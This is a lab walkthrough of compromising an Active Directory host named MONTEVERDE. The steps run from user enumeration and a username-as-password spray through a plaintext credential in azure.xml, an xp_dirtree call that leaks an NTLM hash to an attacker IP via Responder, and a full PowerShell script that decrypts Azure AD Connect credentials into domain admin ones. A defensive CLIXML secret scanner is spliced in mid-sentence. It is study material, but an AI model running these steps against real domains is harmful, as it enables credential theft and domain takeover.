## Anonymous User -> `SABatchJobs`

### [[SMB Enumeration|SMB Enumeration]]

Domain: megabank.local

- null session? - permitted
- share enumeration? - not permitted
- guest? disabled
- `--rid-brute`? not allowed

### [[LDAP - Enumeration|LDAP - Enumeration]]

- anonymous bind? - permitted
	- can get users
	- checked description field, no passwords

Considering that we now have a list of usernames, we can attempt:

- [[AS-REP Roasting]]
- Password sprays

```txt
# users.txt
Guest
MONTEVERDE$
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
```

### [[AS-REP Roasting]]

```sh
[λ]- [credz]-> GetNPUsers.py megabank.local/ -dc-ip $RHOST -usersfile users.txt -format hashcat > ASREPRoastHashes.txt
[λ]- [credz]-> ls
ASREPRoastHashes.txt  users.txt  xato-net-10-million-usernames.txt
[λ]- [credz]-> cat ASREPRoastHashes.txt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User MONTEVERDE$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set
```

Seems like we got no love there....

### Password Sprayz

We attempt to leverage `users.txt` to password spray with the `username:username` pattern. We get a hit on the SABatch user:

- `SABatch:SABatch`

**Note to self:** this didn't work on the first spray and I had to look at the hints to even consider trying this. Another fine method added to the book.
## `SABatchJobs`->`mhope`

### WinRM

- not permitted

### SMB

![[Pasted image 20250203161700.png]]

- `azure_uploads` - appears empty?
- `users
	- `mhope\azure.xml` contains some config params, including another **password**

```sh
[λ]- [SABatchJobs]-> cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r</S>
    </Props>
  </Obj>
</Objs>%
```

Let's try that password with `mhope`:

![[Pasted image 20250203162534.png]]

## Authenticated External Access `mhope`

`mhope:4n0therD4y@n0th3r
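The `azure.xml` above is PowerShell CLIXML (what `Export-Clixml` writes), and the credential sits in plain text in an `<S N="Password">` property. As an added example (not part of this writeup), here is a small scanner a defender can run over a mounted share to flag CLIXML files carrying such properties; the sample document is constructed from the layout above with a placeholder value, and the property-name list is my own assumption.

```python
import pathlib
import xml.etree.ElementTree as ET

# CLIXML namespace used by Export-Clixml / Import-Clixml.
PS_NS = "http://schemas.microsoft.com/powershell/2004/04"

# Constructed sample modelled on the azure.xml layout; the secret is a placeholder.
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">PLACEHOLDER_SECRET</S>
    </Props>
  </Obj>
</Objs>"""

# Property names treated as secrets (assumed list, extend as needed).
SECRET_PROPS = {"password", "secret", "clientsecret", "accesskey", "token"}

def find_clixml_secrets(xml_text):
    """Return (type_name, property_name, redacted_value) for each string
    property whose name looks like a secret. Values are redacted so the
    report itself does not leak the credential."""
    root = ET.fromstring(xml_text)
    findings = []
    for obj in root.iter(f"{{{PS_NS}}}Obj"):
        tn = obj.find(f"{{{PS_NS}}}TN/{{{PS_NS}}}T")
        type_name = tn.text if tn is not None else "<unknown>"
        props = obj.find(f"{{{PS_NS}}}Props")
        if props is None:
            continue
        for prop in props:
            name = prop.get("N", "")
            if prop.tag == f"{{{PS_NS}}}S" and name.lower() in SECRET_PROPS and prop.text:
                redacted = prop.text[:2] + "*" * (len(prop.text) - 2)
                findings.append((type_name, name, redacted))
    return findings

def scan_directory(path):
    """Walk a mounted share; return {file: findings} for CLIXML files with secrets."""
    results = {}
    for p in pathlib.Path(path).rglob("*.xml"):
        try:
            text = p.read_text(encoding="utf-8-sig")
            if "schemas.microsoft.com/powershell" in text:
                hits = find_clixml_secrets(text)
                if hits:
                    results[str(p)] = hits
        except (OSError, UnicodeDecodeError, ET.ParseError):
            continue  # unreadable or malformed file: skip, keep scanning
    return results
```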
- No new SMB material
- we can get internal access using [[Evil-WinRM]]

### Bloodhound

- Reveals that `mhope` is a member of `Azure Admins`.

### Windows Enumeration

- Reveals that MSSQL is running.

### MSSQL enumeration

Running [[PowerUpSQL]] reveals the following vulnerability:

```
ComputerName  : MONTEVERDE
Instance      : MONTEVERDE
Vulnerability : Excessive Privilege - Execute xp_dirtree
Description   : xp_dirtree is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to force the SQL Server service account to authenticate to a remote attacker. The service account password hash can then be captured + cracked or relayed to gain unauthorized access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used. Thats because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default.
Remediation   : Remove EXECUTE privileges on the XP_DIRTREE procedure for non administrative logins and roles. Example command: REVOKE EXECUTE ON xp_dirtree to Public
Severity      : Medium
IsVulnerable  : Yes
IsExploitable : Yes
Exploited     : No
ExploitCmd    : Crack the password hash offline or relay it to another system.
Details       : The public principal has EXECUTE privileges on the xp_dirtree procedure in the master database.
Reference     : https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/
Author        : Scott Sutherland (@_nullbind), NetSPI 2016
```

I'll fire up Responder, which will act as an authentication endpoint for the `xp_dirtree` stored procedure, enabling me to capture the resulting [[NTLM Hash]] on my attacker machine:

```sh
responder.sh tun1
```

And finally, on the victim machine, in order to trigger the authentication request, I'll invoke the `xp_dirtree` stored procedure with my attacker IP as the designated endpoint:

```powershell
sqlcmd -Q "xp_dirtree '\\10.10.14.11\test'"
```

And yahtzee, Responder yields an NTLMv2-SSP hash:

```
[SMB] NTLMv2-SSP Client   : 10.10.10.172
[SMB] NTLMv2-SSP Username : MEGABANK\MONTEVERDE$
[SMB] NTLMv2-SSP Hash     : MONTEVERDE$::MEGABANK:0e7840914e0941f
```

Given that we're dealing with an NTLMv2 hash, we won't be able to use it in a [[Pass The Hash Attack (PTH) - TODO]], and since we're dealing with an AD network containing a single instance, there's no possibility of performing an [[NTLMv2 Relay Attack]] either. This leaves us with the sole option of cracking the hash, which doesn't crack...
### Azure AD Connect

- See [[Azure AD Connect]]

A modification to the script is necessary:

```powershell
# decrypt.ps1
Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"

# Changed this line to accommodate the custom rather than express installation of MSSQL
$client = New-Object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true; Initial Catalog=ADSync"
$client.Open()

# Pull the key set identifiers and entropy used to protect the MA configuration
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

# Pull the AD management agent's config XML and its encrypted credential blob
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

# Use the AD Sync crypto library to load the key set and decrypt the blob
Add-Type -Path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = Select-Xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | Select-Object @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = Select-Xml -Content $config -XPath "//parameter[@name='forest-login-user']" | Select-Object @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = Select-Xml -Content $decrypted -XPath "//attribute" | Select-Object @{Name = 'Password'; Expression = {$_.node.InnerText}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
```

Execution of the script yields admin credentials:

```
*Evil-WinRM* PS C:\Users\mhope\Documents> .\decrypt.ps1
AD Connect Sync Credential Extract POC (@_xpn_)

Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
```

## Privesc - `Administrator`

We leverage the above-mentioned credentials to gain remote access.

## Lessons Learned

- Got some practice in using [[MSSQL]]; I had not done that before using the `sqlcmd` command, nor had I any prior experience using [[PowerUpSQL]].
- I got fucked by the Azure AD Connect section, had to just slavishly follow a writeup, but I did grok the outline of the exploit.
- Discovered [go-windapsearch](https://github.com/ropnop/go-windapsearch.git)